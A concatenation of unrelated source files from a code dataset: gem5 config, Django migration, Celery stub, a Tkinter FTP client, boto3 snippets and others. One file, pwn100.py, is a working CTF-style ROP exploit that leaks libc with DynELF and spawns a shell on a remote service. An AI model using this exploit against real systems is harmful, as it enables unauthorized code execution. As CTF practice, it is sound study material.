17277b09a208d437d0b3a5e514b483bc5301ee4f
|
cd00cb17d98efed12e1e364dae8676101394f135
|
refs/heads/master
| 2016-09-07T18:50:25.672256
| 2013-01-25T00:00:00
| 2013-01-28T02:41:31
| 1,970,791
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,202
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from ctypes import *
import os.path
def GetCharPStr(charp):
    i = 0
    l = []
    while charp[i] != '\0':
        l.append(charp[i])
        i += 1
    return ''.join(l)
def GetLibCxxParser():
    '''The library path is passed in via sys.argv[1]'''
    import platform
    OSName = platform.system()
    try:
        import vim
        import sys
        #print sys.argv
        library = sys.argv[1]
        return CDLL(library)
    except:
        return CDLL(os.path.expanduser("~/libCxxParser.so"))
libCxxParser = GetLibCxxParser()
CxxHWParser_Create = libCxxParser.CxxHWParser_Create
CxxHWParser_Create.restype = c_void_p
CxxHWParser_Create.argtypes = [c_char_p]
CxxHWParser_Destroy = libCxxParser.CxxHWParser_Destroy
CxxHWParser_Destroy.argtypes = [c_void_p]
CxxOmniCpp_Create = libCxxParser.CxxOmniCpp_Create
CxxOmniCpp_Create.restype = c_void_p
CxxOmniCpp_Create.argtypes = [c_void_p, c_char_p]
CxxOmniCpp_Destroy = libCxxParser.CxxOmniCpp_Destroy
CxxOmniCpp_Destroy.argtypes = [c_void_p]
CxxOmniCpp_GetSearchScopes = libCxxParser.CxxOmniCpp_GetSearchScopes
CxxOmniCpp_GetSearchScopes.restype = c_char_p
CxxOmniCpp_GetSearchScopes.argtypes = [c_void_p]
GetScopeStack = libCxxParser.GetScopeStack
GetScopeStack.restype = POINTER(c_char)
GetScopeStack.argtypes = [c_char_p]
CxxParser_GetVersion = libCxxParser.CxxParser_GetVersion
CxxParser_GetVersion.restype = c_int
CxxParser_GetVersion.argtypes = []
#pParser = CxxHWParser_Create("test");
#print pParser
#pResult = CxxOmniCpp_Create(pParser, "hello");
#print pResult
#print CxxOmniCpp_GetSearchScopes(pResult)
#CxxOmniCpp_Destroy(pResult);
#pResult = None
#CxxHWParser_Destroy(pParser)
#pParser = None
if __name__ == "__main__":
import sys
print 'CxxParser version: %d' % CxxParser_GetVersion()
if not sys.argv[1:]:
print "usage: %s {file} [line]" % sys.argv[0]
sys.exit(1)
line = 1000000
if sys.argv[1:]:
fn = sys.argv[1]
if sys.argv[2:]:
line = int(sys.argv[2])
f = open(fn)
allLines = f.readlines()
f.close()
lines = ''.join(allLines[: line])
#print lines
print GetCharPStr(GetScopeStack(lines))
|
[
"scraper@vim-scripts.org"
] |
scraper@vim-scripts.org
|
e163229f5e46d720fdae4023213da540e1db2015
|
d63b1b36634b68070f6f3c017c0250a7ea646e6f
|
/SMC/GEM5/gem5/configs/ruby/Ruby.py
|
3c43fa6c6ab7b2583830352c954a5cc2bd02d152
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later"
] |
permissive
|
jiwon-choe/Brown-SMCSim
|
ccf506d34d85fb3d085bf50ed47de8b4eeaee474
|
ff3d9334c1d5c8d6a00421848c0d51e50e6b67f8
|
refs/heads/master
| 2021-06-30T00:15:57.128209
| 2020-11-24T03:11:41
| 2020-11-24T03:11:41
| 192,596,189
| 15
| 8
|
MIT
| 2019-06-20T15:43:00
| 2019-06-18T18:53:40
|
C++
|
UTF-8
|
Python
| false
| false
| 8,951
|
py
|
# Copyright (c) 2012 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2006-2007 The Regents of The University of Michigan
# Copyright (c) 2009 Advanced Micro Devices, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Brad Beckmann
import math
import m5
from m5.objects import *
from m5.defines import buildEnv
from m5.util import addToPath, fatal
addToPath('../topologies')
def define_options(parser):
# By default, ruby uses the simple timing cpu
parser.set_defaults(cpu_type="timing")
parser.add_option("--ruby-clock", action="store", type="string",
default='2GHz',
help="Clock for blocks running at Ruby system's speed")
# Options related to cache structure
parser.add_option("--ports", action="store", type="int", default=4,
help="used of transitions per cycle which is a proxy \
for the number of ports.")
# ruby network options
parser.add_option("--topology", type="string", default="Crossbar",
help="check src/mem/ruby/network/topologies for complete set")
parser.add_option("--mesh-rows", type="int", default=1,
help="the number of rows in the mesh topology")
parser.add_option("--garnet-network", type="choice",
choices=['fixed', 'flexible'], help="'fixed'|'flexible'")
parser.add_option("--network-fault-model", action="store_true", default=False,
help="enable network fault model: see src/mem/ruby/network/fault_model/")
# ruby mapping options
parser.add_option("--numa-high-bit", type="int", default=0,
help="high order address bit to use for numa mapping. " \
"0 = highest bit, not specified = lowest bit")
# ruby sparse memory options
parser.add_option("--use-map", action="store_true", default=False)
parser.add_option("--map-levels", type="int", default=4)
parser.add_option("--recycle-latency", type="int", default=10,
help="Recycle latency for ruby controller input buffers")
parser.add_option("--random_seed", type="int", default=1234,
help="Used for seeding the random number generator")
parser.add_option("--ruby_stats", type="string", default="ruby.stats")
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
eval("%s.define_options(parser)" % protocol)
def create_topology(controllers, options):
""" Called from create_system in configs/ruby/<protocol>.py
Must return an object which is a subclass of BaseTopology
found in configs/topologies/BaseTopology.py
This is a wrapper for the legacy topologies.
"""
exec "import %s as Topo" % options.topology
topology = eval("Topo.%s(controllers)" % options.topology)
return topology
def create_system(options, system, piobus = None, dma_ports = []):
system.ruby = RubySystem(no_mem_vec = options.use_map)
ruby = system.ruby
# Set the network classes based on the command line options
if options.garnet_network == "fixed":
NetworkClass = GarnetNetwork_d
IntLinkClass = GarnetIntLink_d
ExtLinkClass = GarnetExtLink_d
RouterClass = GarnetRouter_d
InterfaceClass = GarnetNetworkInterface_d
elif options.garnet_network == "flexible":
NetworkClass = GarnetNetwork
IntLinkClass = GarnetIntLink
ExtLinkClass = GarnetExtLink
RouterClass = GarnetRouter
InterfaceClass = GarnetNetworkInterface
else:
NetworkClass = SimpleNetwork
IntLinkClass = SimpleIntLink
ExtLinkClass = SimpleExtLink
RouterClass = Switch
InterfaceClass = None
# Instantiate the network object so that the controllers can connect to it.
network = NetworkClass(ruby_system = ruby, topology = options.topology,
routers = [], ext_links = [], int_links = [], netifs = [])
ruby.network = network
protocol = buildEnv['PROTOCOL']
exec "import %s" % protocol
try:
(cpu_sequencers, dir_cntrls, topology) = \
eval("%s.create_system(options, system, dma_ports, ruby)"
% protocol)
except:
print "Error: could not create sytem for ruby protocol %s" % protocol
raise
# Create a port proxy for connecting the system port. This is
# independent of the protocol and kept in the protocol-agnostic
# part (i.e. here).
sys_port_proxy = RubyPortProxy(ruby_system = ruby)
# Give the system port proxy a SimObject parent without creating a
# full-fledged controller
system.sys_port_proxy = sys_port_proxy
# Connect the system port for loading of binaries etc
system.system_port = system.sys_port_proxy.slave
# Create the network topology
topology.makeTopology(options, network, IntLinkClass, ExtLinkClass,
RouterClass)
if InterfaceClass != None:
netifs = [InterfaceClass(id=i) for (i,n) in enumerate(network.ext_links)]
network.netifs = netifs
if options.network_fault_model:
assert(options.garnet_network == "fixed")
network.enable_fault_model = True
network.fault_model = FaultModel()
    # Loop through the directory controllers.
# Determine the total memory size of the ruby system and verify it is equal
# to physmem. However, if Ruby memory is using sparse memory in SE
# mode, then the system should not back-up the memory state with
# the Memory Vector and thus the memory size bytes should stay at 0.
# Also set the numa bits to the appropriate values.
total_mem_size = MemorySize('0B')
ruby.block_size_bytes = options.cacheline_size
block_size_bits = int(math.log(options.cacheline_size, 2))
if options.numa_high_bit:
numa_bit = options.numa_high_bit
else:
# if the numa_bit is not specified, set the directory bits as the
# lowest bits above the block offset bits, and the numa_bit as the
# highest of those directory bits
dir_bits = int(math.log(options.num_dirs, 2))
numa_bit = block_size_bits + dir_bits - 1
for dir_cntrl in dir_cntrls:
total_mem_size.value += dir_cntrl.directory.size.value
dir_cntrl.directory.numa_high_bit = numa_bit
phys_mem_size = sum(map(lambda r: r.size(), system.mem_ranges))
assert(total_mem_size.value == phys_mem_size)
ruby.mem_size = total_mem_size
# Connect the cpu sequencers and the piobus
if piobus != None:
for cpu_seq in cpu_sequencers:
cpu_seq.pio_master_port = piobus.slave
cpu_seq.mem_master_port = piobus.slave
if buildEnv['TARGET_ISA'] == "x86":
cpu_seq.pio_slave_port = piobus.master
ruby._cpu_ports = cpu_sequencers
ruby.num_of_sequencers = len(cpu_sequencers)
ruby.random_seed = options.random_seed
|
[
"brandnew7th@gmail.com"
] |
brandnew7th@gmail.com
|
4cab7f02d839b5bf99ada9539b6cce74b4359343
|
9f0e740c6486bcb12f038c443b039c886124e55c
|
/python-study/library/celery/period/app.py
|
5d1923b6a0c639b8355f935d8cc951c569b7d363
|
[] |
no_license
|
zfanai/python-study
|
373ff09bd1e6be9e098bde924c98f5277ad58a54
|
de11a6c8018730bb27e26808f5cbc0c615b4468f
|
refs/heads/master
| 2021-01-18T17:59:16.817832
| 2017-11-06T09:33:21
| 2017-11-06T09:33:21
| 86,831,175
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 137
|
py
|
#encoding:gbk
from celery import Celery
import config
app=Celery()
app.config_from_object(config)
print app.conf.CELERY_TIMEZONE
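# A minimal sketch of the config module this app expects; the setting names are assumptions
# based on the old-style uppercase Celery settings used above (CELERY_TIMEZONE is the one read here):
#     CELERY_TIMEZONE = 'Asia/Shanghai'
#     BROKER_URL = 'redis://localhost:6379/0'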
|
[
"zf_sch@126.com"
] |
zf_sch@126.com
|
1984f8f05213e4c460c85d2ac2ddcae735c9c2c8
|
8e36265de7d95d4fd7bc8ccec9a25ebb07b4e435
|
/pola/ai_pics/migrations/0009_auto_20210117_0154.py
|
402016adab9dc66a88a8b7f885e4dddea1f9990a
|
[
"BSD-3-Clause"
] |
permissive
|
KlubJagiellonski/pola-backend
|
edd4b7c4115f008390a665554d973924f69f47af
|
e16eab52bf2e5ddacea1d69c3ac165cd761a2171
|
refs/heads/master
| 2023-09-01T21:14:06.625762
| 2023-09-01T04:42:15
| 2023-09-01T04:42:15
| 40,557,946
| 33
| 15
|
BSD-3-Clause
| 2023-09-14T08:45:36
| 2015-08-11T18:20:28
|
Python
|
UTF-8
|
Python
| false
| false
| 700
|
py
|
# Generated by Django 3.1.5 on 2021-01-17 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ai_pics', '0008_auto_20210117_0109'),
]
operations = [
migrations.AlterField(
model_name='aipics',
name='flash_used',
field=models.BooleanField(null=True),
),
migrations.AlterField(
model_name='aipics',
name='is_valid',
field=models.BooleanField(null=True),
),
migrations.AlterField(
model_name='aipics',
name='was_portrait',
field=models.BooleanField(null=True),
),
]
|
[
"noreply@github.com"
] |
KlubJagiellonski.noreply@github.com
|
3eb241c050e2b325524ee5f76f4ba74669099d55
|
0884dfe08f536f1883f20ed102001fdfa0ac7b4e
|
/example/leak_lib/pwn100.py
|
a5298933e439e0c2ff2821e972b699c19c1744fb
|
[] |
no_license
|
xiaoyj/ShawPwn
|
4b40329be2735ea18e42a8006ba906c5903851f0
|
cfa408f22094f0a03607d1f56043d641735d9cb3
|
refs/heads/master
| 2021-04-04T20:34:38.675318
| 2020-03-19T11:48:16
| 2020-03-19T11:48:16
| 248,485,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
#!/usr/bin/python
#coding:utf-8
#64-bit: leak the libc address through the puts function, using the universal gadgets
from pwn import *
context.update(arch = 'amd64', os = 'linux', timeout = 1)
io = remote('172.17.0.3', 10001)
def write(data):
for i in data:
io.send(i)
elf=ELF("./pwn100")
read_got=elf.got['read']
puts_plt=elf.plt['puts']
pop_rdi=0x0000000000400763
start=0x0000000000400550
start_addr = 0x400550
pop_rdi = 0x400763
pop6_addr = 0x40075a #universal gadget 1: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; retn
mov_call_addr = 0x400740 #universal gadget 2: mov rdx, r13; mov rsi, r14; mov edi, r15d; call qword ptr [r12+rbx*8]
binsh_addr = 0x60107c #the bss holds the STDIN/STDOUT FILE structs; overwriting them crashes the program, so a fixed writable address is used instead
def leak(addr):
count = 0
up = ''
content = ''
payload="A"*0x48
payload+=p64(pop_rdi)
payload+=p64(addr)
payload+=p64(puts_plt)
payload+=p64(start)
payload=payload.ljust(200,'B')
write(payload)
io.recvline()
    while True: #keep reading in a loop so recv() never misses part of the output
        c = io.recv(numb=1, timeout=0.1) #read one byte at a time, with a timeout so nothing is left behind
        count += 1
        if up == '\n' and c == "": #previous char was a newline and nothing more is readable: output is complete
            content = content[:-1]+'\x00' #replace the trailing newline with \x00
            break
        else:
            content += c #append to the output
            up = c #remember the last character
    content = content[:4] #keep only a 4-byte slice of the output as the value handed to DynELF
log.info("%#x => %s" % (addr, (content or '').encode('hex')))
return content
d = DynELF(leak, elf = elf)
system_addr = d.lookup('system', 'libc')
read_addr = d.lookup('read', 'libc')
log.info("system_addr = %#x", system_addr)
log.info("read_addr = %#x", read_addr)
payload = "A"*72 #padding
payload += p64(pop6_addr) #universal gadget 1
payload += p64(0) #rbx = 0
payload += p64(1) #rbp = 1, to satisfy the check after the call in universal gadget 2 returns
payload += p64(read_got) #r12 = read's GOT entry (holds read's real address); gadget 2 does call qword ptr [r12+rbx*8]
payload += p64(8) #r13 = 8, byte count for read; gadget 2 moves it into rdx
payload += p64(binsh_addr) #r14 = address where read will store "/bin/sh"; gadget 2 moves it into rsi
payload += p64(0) #r15 = 0, read's fd argument (STDIN); gadget 2 moves it into edi
payload += p64(mov_call_addr) #universal gadget 2
payload += '\x00'*56 #gadget 2 is followed by a check and then gadget 1 again; this padding walks the stack through them
payload += p64(start_addr) #jump back to start to restore the stack
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.recvuntil('bye~\n')
io.send("/bin/sh\x00") #上面的一段payload调用了read函数读取"/bin/sh\x00",这里发送字符串
payload = "A"*72 #padding
payload += p64(pop_rdi) #set up system's argument
payload += p64(binsh_addr) #rdi = &("/bin/sh\x00")
payload += p64(system_addr) #call system("/bin/sh")
payload = payload.ljust(200, "B") #padding
io.send(payload)
io.interactive()
|
[
"xiaoyijie2007@126.com"
] |
xiaoyijie2007@126.com
|
86dc84d7f0e363f3d1b4cdfe3ac94760b4a104b2
|
b26802c1fc0ac33cabf6d2ab538c98f45b9b291f
|
/colossus/apps/notifications/__init__.py
|
84da84df286aa3bfa5c86e37b3d96df551845a2c
|
[
"MIT"
] |
permissive
|
Beracah-Group/colossus
|
4ba81092dc5c9c694b22eb4101f63e7747961fcf
|
7bce25039a223da7197cc8a969ec72ee26aeffa8
|
refs/heads/master
| 2020-03-26T08:58:45.572073
| 2018-08-14T13:35:53
| 2018-08-14T13:35:53
| 144,728,897
| 2
| 0
|
MIT
| 2018-08-14T14:06:50
| 2018-08-14T14:06:50
| null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
default_app_config = 'colossus.apps.notifications.apps.NotificationsConfig'
|
[
"vitorfs@gmail.com"
] |
vitorfs@gmail.com
|
df5bd7dced3de122cbe784bd31d4b447ba40bdc3
|
039f2c747a9524daa1e45501ada5fb19bd5dd28f
|
/ABC111/ABC111b.py
|
d0841383fb4172230f365cbdcec870be2139ac92
|
[
"Unlicense"
] |
permissive
|
yuto-moriizumi/AtCoder
|
86dbb4f98fea627c68b5391bf0cc25bcce556b88
|
21acb489f1594bbb1cdc64fbf8421d876b5b476d
|
refs/heads/master
| 2023-03-25T08:10:31.738457
| 2021-03-23T08:48:01
| 2021-03-23T08:48:01
| 242,283,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 197
|
py
|
# ABC111b
import sys
input = sys.stdin.readline
sys.setrecursionlimit(10**6)
n = int(input())
ans = 111
for i in range(1, 10):
if (n <= 111 * i):
ans = 111*i
break
print(ans)
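# Equivalent closed form (a sketch): the answer is the smallest multiple of 111 not less than n,
# i.e. ans = 111 * ((n + 110) // 111), since n is a three-digit integer.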
|
[
"kurvan1112@gmail.com"
] |
kurvan1112@gmail.com
|
eacd80b9251895bf54c2441bc92a6037be61fdee
|
a646afb4228fbc1b79e68b714e4db628dda33c93
|
/ftpProgram.py
|
4332bb5a9705e21c4347d22808cb4404f19526cd
|
[] |
no_license
|
kralmachine/ftpprogrammingwithpython
|
de220a022f11c3d5110530194254cdd90c299faa
|
f3fa3c48f2fe7d1d120fa947768e7a6de1d56fef
|
refs/heads/master
| 2021-04-12T12:36:05.306636
| 2018-03-21T13:42:16
| 2018-03-21T13:42:16
| 126,184,016
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,110
|
py
|
# ABDULLAH AVŞAR 141180501, WEDNESDAY, 21 MARCH 2018
#BM402 COMPUTER NETWORKS ASSIGNMENT - 3
from tkinter import *
from tkinter import messagebox
from tkinter import filedialog
import os
import ftplib
say=0
def girisYap():
global say
say=0
if(hostname.get()!='' and userName.get()!='' and passWord.get()!=''):
        ftp=ftplib.FTP(hostname.get()) #the host name is entered, e.g. 192.168.0.23 or ftp.python.org
        ftp.login(userName.get(),passWord.get()) #the username and password for the host are entered
        print(ftp.getwelcome()) #a welcome message is shown after logging in to the host
        print('Current Directory',ftp.pwd()) #the current directory path is shown
        ftp.dir() #fetch the current file and folder listing
        gelenServerDosyalar.insert(END,ftp.getwelcome()) #print the FTP welcome banner
        gelenServerDosyalar.insert(END,'Current Directory'+ftp.pwd()) #show the current directory path
        for direc in ftp.nlst(): #loop over the current entries and add them to the list
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'-----------------------------')
gelenServerDosyalar.pack(side=RIGHT)
say=1
else:
print('Lütfen Verileri Doldurun')
def dosyaSec():
    directory=filedialog.askdirectory() #open a directory chooser for the client
print (directory)
    for roots,dirs,files in os.walk(directory): #add the files and folders found under the chosen directory
for file in files:
print('File =%s' % file)
gelenClientDosyalar.insert(END,file)
for direc in dirs:
print('Direc =%s' % direc)
gelenClientDosyalar.insert(END,direc)
gelenClientDosyalar.insert(END,'-----------------------------')
gelenClientDosyalar.pack(side=LEFT)
def cikisYap():
    mGUI.destroy() #destroy the form object and release it from memory
    mGUI.quit() #close the form
def komutCalistir():
    command=komutIslem.get() #store the entered command in the command variable
print(command)
    commands=command.split() #split the command into tokens so the parts can be used
for i in commands:
print(i)
print(say,command)
    if(say==1 and command!=''): #check that a login was performed and the command is not empty
ftp=ftplib.FTP(hostname.get())
ftp.login(userName.get(),passWord.get())
        if commands[0]=='cd': #change the working directory
try:
ftp.cwd(commands[1])
print('Directory of ',ftp.pwd())
gelenServerDosyalar.insert(END,'Directory of '+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
print('Current Diretory',ftp.pwd())
gelenServerDosyalar.insert(END,'Directory of '+ftp.pwd())
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
                    print(error_code[1],'Directory may not exist or you may not have permission to view it')
                    gelenServerDosyalar.insert(END,error_code[1]+'Directory may not exist or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='get': #download a file
try:
                ftp.retrbinary('RETR '+commands[2], open(commands[1]+commands[2],'wb').write) #write the file locally, downloading it to the requested location
print('File successful download')
gelenServerDosyalar.insert(END,'File successful download')
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
                    print(error_code[1],'File may not exist or you may not have permission to view it')
                    gelenServerDosyalar.insert(END,error_code[1]+' File may not exist or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='fup': #upload a file
try:
                ftp.storlines('STOR '+commands[2],open(commands[1]+commands[2],'rb')) #upload the requested file to the requested location
print('File successful upload')
gelenServerDosyalar.insert(END,'File successful upload')
gelenServerDosyalar.insert(END,'----------------------------------')
except ftplib.error_perm as e: #handle 550 (not found / no permission error)
error_code=str(e).split(None,1)
if error_code[0]=='550':
                    print(error_code[1],'File may not exist or you may not have permission to view it')
                    gelenServerDosyalar.insert(END,error_code[1]+'File may not exist or you may not have permission to view it')
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='ls': #list the files
print('Directory of',ftp.pwd())
ftp.dir()
            gelenServerDosyalar.insert(END,'Directory of '+ftp.pwd())
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='mkd': #create a directory
ftp.mkd('/'+commands[1])
print('Successful create a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful create a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='rn': #rename a file or directory
ftp.rename('/'+commands[1],'/'+commands[2])
print('Successful rename a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful rename a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='delete': #delete a file
ftp.delete('/'+commands[1])
print('Successful remove a file')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful remove a file')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='rmd': #remove a directory
ftp.rmd('/'+commands[1])
print('Successful remove a directory')
print('Directory of',ftp.pwd())
gelenServerDosyalar.insert(END,'Successful remove a directory')
gelenServerDosyalar.insert(END,'Directory of'+ftp.pwd())
ftp.dir()
for direc in ftp.nlst():
gelenServerDosyalar.insert(END,direc)
gelenServerDosyalar.insert(END,'----------------------------------')
        elif commands[0]=='exit': #quit the FTP session
ftp.quit()
print('İyi Günler FTP Kapatmıştır')
gelenServerDosyalar.insert(END,'İyi Günler FTP Kapatmıştır')
gelenServerDosyalar.insert(END,'----------------------------------')
        else: #if none of the supported commands was used, report an invalid command
            print('Invalid command try again (valid options cd/get/fup/ls/mkd/rn/delete/rmd/exit)')
            gelenServerDosyalar.insert(END,'Invalid command try again (valid options cd/get/fup/ls/mkd/rn/delete/rmd/exit)')
gelenServerDosyalar.insert(END,'---------------------------------------')
    else: #if no login was performed, show an error message
messagebox.showerror('Hata','Lütfen Host Girişi Yapınız\nveya\nKomut Satırını Boş Geçmeyiniz.')
mGUI=Tk() #create the Tkinter GUI object
mGUI.title('FTP PROGRAM') #set the GUI title
mGUI.geometry('1000x650+200+50') #set the GUI size
hostname=StringVar() #string variable bound to an Entry widget
userName=StringVar() #string variable bound to an Entry widget
passWord=StringVar() #string variable bound to an Entry widget
komutIslem=StringVar() #string variable bound to an Entry widget
#Username / password / host layout
lblGirisYazi=Label(mGUI,text='FTP PROGRAMINA HOŞ GELDİNİZ\nLÜTFEN GİRİŞ İŞLEMLERİNİ YAPINIZ',fg='Red').pack()
hostName=Entry(mGUI,textvariable=hostname,width=20).pack() #hostname entry
kulAd=Entry(mGUI,textvariable=userName,width=20).pack() #username entry
kulSifre=Entry(mGUI,textvariable=passWord,width=20).pack() #password entry
btnGiris=Button(mGUI,text='Giriş Yapınız',command=girisYap,fg='Black').pack() #login action
#Client / server layout
#Client
btnDosyaSec=Button(mGUI,text='ClientDosya Seç',fg='Black',command=dosyaSec).pack()
gelenClientDosyalar=Listbox(mGUI,width=60,height=30)
#Server
gelenServerDosyalar=Listbox(mGUI,width=60,height=30)
btnGiris=Button(mGUI,text='Çıkış Yapınız',command=cikisYap,fg='Black').pack()
#Command entry and command execution
lblGirisYazi=Label(mGUI,text='FTP KOMUT ÇALIŞTIRMA EKRANI (cd,get,fup,ls,mkd,rn,delete,rmd,exit)',fg='Red').pack()
komutCalistirma=Entry(mGUI,textvariable=komutIslem,width=80).pack() #entry widget for typing commands
btnGiris=Button(mGUI,text='Komut Çalıştır',command=komutCalistir,fg='Black').pack()
lblBilgilendirme=Label(mGUI,fg='red',text='cd,get,fup,ls,mkd,rn,delete,rmd,exit komutları vardır.\nBunlar şöyledir\ncd komutu klasör erişi için örn (cd dosya)\nget download için örn (get C:\\Users\\aAa\\Desktop\\ deneme.txt)\nfup upload için örn (fup C:\\Users\\aAa\\Desktop\\ deneme.txt)\nls komutu listeleme yapar örn (ls)\nmkd komutu bir klasöt oluşturur örn (mkd deneme)\nrn komutu dosya ismi değiştirme yapar örn (rn deneme dene)\ndelete işlemi dosya siler örn (delete deneme.txt)\nrmd işlemi klasör siler örn (rmd deneme)\nexit işlemi ftp kapatır örn (exit)')
lblBilgilendirme.pack()
mGUI.mainloop() #keep the GUI on screen (Tk main loop)
|
[
"noreply@github.com"
] |
kralmachine.noreply@github.com
|
0e0db48e77456ab1dc55c0ea161b52b3e33e2f02
|
17a3cf69421e3cef5196b8cc28bf2a342884d766
|
/Downloading_files_s3.py
|
d596b878725ccf6964b9dbe1e6f9e21730c547c7
|
[] |
no_license
|
POC-AWS-services/AWS-S3
|
976f230f4c9c1ba9d9efc67f95979eb388257784
|
4a08aa218155e1a5b99f0f3f9d49ae7251d4e6e7
|
refs/heads/master
| 2022-11-29T09:09:11.046099
| 2020-07-23T08:20:08
| 2020-07-23T08:20:08
| 281,882,276
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
__Author__ = 'Prameet Bisht'
__Version__ = "0.0.1"
__Email__ = "myprameet09@gmail.com"
__Github__ = "https://github.com/orgs/POC-AWS-services/dashboard"
#The download_file method accepts the names of the bucket and object to download and the filename to save the file to.
import boto3
s3 = boto3.client('s3')
s3.download_file('BUCKET_NAME', 'OBJECT_NAME', 'FILE_NAME')
#The download_fileobj method accepts a writeable file-like object. The file object must be opened in binary mode, not text mode.
s3 = boto3.client('s3')
with open('FILE_NAME', 'wb') as f:
s3.download_fileobj('BUCKET_NAME', 'OBJECT_NAME', f)
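# download_fileobj also accepts an in-memory buffer (a sketch; the bucket and object names are placeholders):
# import io
# buf = io.BytesIO()
# s3.download_fileobj('BUCKET_NAME', 'OBJECT_NAME', buf)
# buf.seek(0)  # buf now holds the object's bytes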
|
[
"myprameet09@gmail.com"
] |
myprameet09@gmail.com
|
0c17d754ebe3de15144d5ae5b742743bb74c6c9e
|
ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1
|
/res/packages/scripts/scripts/client/gui/shared/gui_items/dossier/achievements/GeniusForWarAchievement.py
|
7e725c76279abb1568946eee467f165f33da4db6
|
[] |
no_license
|
webiumsk/WOT-0.9.20.0
|
de3d7441c5d442f085c47a89fa58a83f1cd783f2
|
811cb4e1bca271372a1d837a268b6e0e915368bc
|
refs/heads/master
| 2021-01-20T22:11:45.505844
| 2017-08-29T20:11:38
| 2017-08-29T20:11:38
| 101,803,045
| 0
| 1
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 864
|
py
|
# 2017.08.29 21:49:43 Central Europe (Summer Time)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/GeniusForWarAchievement.py
from dossiers2.ui.achievements import ACHIEVEMENT_BLOCK as _AB
from abstract import SimpleProgressAchievement
class GeniusForWarAchievement(SimpleProgressAchievement):
def __init__(self, dossier, value = None):
super(GeniusForWarAchievement, self).__init__('geniusForWarMedal', _AB.TEAM_7X7, dossier, value)
def _readProgressValue(self, dossier):
return dossier.getRecordValue(_AB.TEAM_7X7, 'geniusForWar')
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\shared\gui_items\dossier\achievements\GeniusForWarAchievement.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:49:43 Central Europe (Summer Time)
|
[
"info@webium.sk"
] |
